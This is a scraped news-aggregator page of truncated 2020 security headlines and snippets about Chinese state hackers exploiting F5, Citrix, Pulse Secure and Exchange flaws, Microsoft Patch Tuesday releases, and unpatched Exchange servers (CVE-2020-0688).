The U.S. government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.
Patches are currently available for all these flaws – and in some cases, have been available for over a year – however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the...

What do F5, Citrix, Pulse Secure all have in common? China exploiting their flaws to hack govt, biz – Feds
The Register • Shaun Nichols in San Francisco • 14 Sep 2020

Beijing's snoops don't even need zero-days to break into valuable networks

The US government says the Chinese government's hackers are preying on a host of high-profile security holes in enterprise IT equipment to infiltrate Uncle Sam's agencies and American businesses.
Yes, this sounds like something from the Department of the Bleeding Obvious – spies do spying on all sides, and all that – but what's interesting in this latest warning is the roll call of vulnerable products being targeted.
In a joint statement, the FBI and Homeland Security's Cybersecu...

Microsoft’s Patch Tuesday Packed with Critical RCE Bugs
Threatpost • Tara Seals • 08 Sep 2020

Microsoft has released patches for 129 security bugs in its September Patch Tuesday update. These include 23 critical flaws, 105 that are important in severity and one moderate bug. Fortunately, none are publicly known or under active exploitation, Microsoft said.
The most severe issue in the bunch is CVE-2020-16875, according to researchers. This is a memory-corruption problem in Microsoft Exchange that allows remote code-execution (RCE) just by sending an email to a target. Running arbit...

Enjoyed the US Labor Day weekend? Because it's September 2020 and Exchange Server can be pwned via email
The Register • Shaun Nichols in San Francisco • 08 Sep 2020

Don't be so smug, Mac users, you're open to an InDesign project file

A nightmare flaw for Exchange Server headlines this month's Patch Tuesday lineup from Microsoft and others.
September sees a bundle of 129 CVE-listed flaws patched by Microsoft. The vast majority of those, 105 in total, are classified as 'important' risks. Another 23 are considered critical bugs, and one is listed as moderate.
None of the bugs have public exploit code or in-the-wild attacks yet.
Of the nearly two-dozen critical patches, Zero Day Initiative's Dustin Childs says ...

APT trends report Q2 2020
Securelist • GReAT • 29 Jul 2020

For more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.
This is our latest installment,...

Microsoft: Attackers increasingly exploit Exchange servers
BleepingComputer • Sergiu Gatlan • 24 Jun 2020

Microsoft's Defender ATP Research Team today issued guidance on how to defend against attacks targeting Exchange servers by blocking malicious activity identified with the help of behavior-based detection.
The Microsoft researchers based their analysis on multiple campaigns of Exchange attacks investigated during early April which showed how the malicious actors deploying web shells on on-premises Exchange servers.
Multiple fileless techniques were also used as part of these attacks,...

Serious Exchange Flaw Still Plagues 350K Servers
Threatpost • Lindsey O'Donnell • 07 Apr 2020

Over 80 percent of exposed Exchange servers are still vulnerable to a severe vulnerability – nearly two months after the flaw was patched, and after researchers warned that multiple threat groups were exploiting it.
The vulnerability in question (CVE-2020-0688) exists in the control panel of Exchange, Microsoft’s mail server and calendaring server. The flaw, which stems from the server failing to properly create unique keys at install time, opens servers up to authenticated attacker...

80% of all exposed Exchange servers still unpatched for critical flaw
BleepingComputer • Sergiu Gatlan • 06 Apr 2020

Over 350,000 of all Microsoft Exchange servers currently exposed on the Internet haven't yet been patched against the CVE-2020-0688 post-auth remote code execution vulnerability affecting all supported Microsoft Exchange Server versions.
This security flaw is present in the Exchange Control Panel (ECP) component —on by default— and it allows attackers to take over vulnerable Microsoft Exchange servers using any previously stolen valid email credentials.
Microsoft patched th...

Microsoft Exchange Server Flaw Exploited in APT Attacks
Threatpost • Lindsey O'Donnell • 09 Mar 2020

Multiple threat groups are actively exploiting a vulnerability in Microsoft Exchange servers, researchers warn. If left unpatched, the flaw allows authenticated attackers to execute code remotely with system privileges.
The vulnerability in question (CVE-2020-0688) exists in the control panel of Exchange, Microsoft’s mail server and calendaring server, and was fixed as part of Microsoft’s February Patch Tuesday updates. However, researchers in a Friday advisory said that unpatched ser...

NSA Warns About Microsoft Exchange Flaw as Attacks Start
BleepingComputer • Sergiu Gatlan • 09 Mar 2020

The U.S. National Security Agency (NSA) warned about a post-auth remote code execution vulnerability in all supported Microsoft Exchange Server servers via a tweet published on the agency's Twitter account.
NSA's tweet
followers to patch the CVE-2020-0688 vulnerability which would enable potential attackers to execute commands on vulnerable Microsoft Exchange servers using email credentials.
Microsoft patched this RCE security flaw as part of the 
and tagged it wi...

Hackers Scanning for Vulnerable Microsoft Exchange Servers, Patch Now!
BleepingComputer • Sergiu Gatlan • 26 Feb 2020

Attackers are actively scanning the Internet for Microsoft Exchange Servers vulnerable to the CVE-2020-0688 remote code execution vulnerability
two weeks ago.
All Exchange Server versions up to the last released patch are exposed to potential attacks following these ongoing scans, including those currently out of support even though
doesn't explicitly list them.
The flaw is present in the Exchange Control Panel (ECP) component and it is caused by Exchange's inability ...

If you're running Windows, I feel bad for you, son. Microsoft's got 99 problems, better fix each one
The Register • Shaun Nichols in San Francisco • 11 Feb 2020

Meanwhile, we're still squashing bugs in Adobe Flash Player... plus stuff from Intel and SAP

Patch Tuesday It's going to be a busy month for IT administrators as Microsoft, Intel, Adobe, and SAP have teamed up to deliver a bumper crop of security fixes for Patch Tuesday.
Microsoft had one of its largest patch bundles in recent memory, as the Windows giant released fixes for 99 CVE-listed vulnerabilities.
These included CVE-2020-0674, a remote code execution flaw in Internet Explorer's Trident rendering engine that is already being exploited in the wild. This hole would typic...

Microsoft Addresses Active Attacks, Air-Gap Danger with 99 Patches
Threatpost • Tara Seals • 11 Feb 2020

Microsoft has issued one of its largest Patch Tuesday updates for the shortest month of the year, addressing 99 security vulnerabilities across a range of products. Twelve of the bugs are listed as critical – and the rest are rated as being important.
The update includes a patch for the zero-day memory-corruption vulnerability disclosed in late January that’s under active attack. The bug tracked as CVE-2020-0674 is a critical flaw for most Internet Explorer versions, allowing remote co...

If you're running Windows, I feel bad for you, son. Microsoft's got 99 problems, better fix each one
The Register • Shaun Nichols in San Francisco • 11 Feb 2020

Meanwhile, we're still squashing bugs in Adobe Flash Player... plus stuff from Intel and SAP

Patch Tuesday It's going to be a busy month for IT administrators as Microsoft, Intel, Adobe, and SAP have teamed up to deliver a bumper crop of security fixes for Patch Tuesday.
Microsoft had one of its largest patch bundles in recent memory, as the Windows giant released fixes for 99 CVE-listed vulnerabilities.
These included CVE-2020-0674, a remote code execution flaw in Internet Explorer's Trident rendering engine that is already being exploited in the wild. This hole would typic...

US govt: China-sponsored hackers targeting Exchange, Citrix, F5 flaws
BleepingComputer • Lawrence Abrams • 01 Jan 1970

Today, the US government issued an advisory on China-sponsored hackers attacking government agencies through vulnerabilities in Microsoft Exchange, Citrix, Pulse, and F5 devices and servers.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is an independent federal agency that protects against and coordinates responses to threats from private and state-sponsored hackers targeting United States interests.
In a new advisory today, CISA and the FBI warn that Chinese MSS-...

The Register

The US government says the Chinese government's hackers are preying on a host of high-profile security holes in enterprise IT equipment to infiltrate Uncle Sam's agencies and American businesses.
Yes, this sounds like something from the Department of the Bleeding Obvious – spies do spying on all sides, and all that – but what's interesting in this latest warning is the roll call of vulnerable products being targeted.
In a joint statement, the FBI and Homeland Security's Cybersecu...

The Register

A nightmare flaw for Exchange Server headlines this month's Patch Tuesday lineup from Microsoft and others.
September sees a bundle of 129 CVE-listed flaws patched by Microsoft. The vast majority of those, 105 in total, are classified as 'important' risks. Another 23 are considered critical bugs, and one is listed as moderate.
None of the bugs have public exploit code or in-the-wild attacks yet.
Of the nearly two-dozen critical patches, Zero Day Initiative's Dustin Childs says ...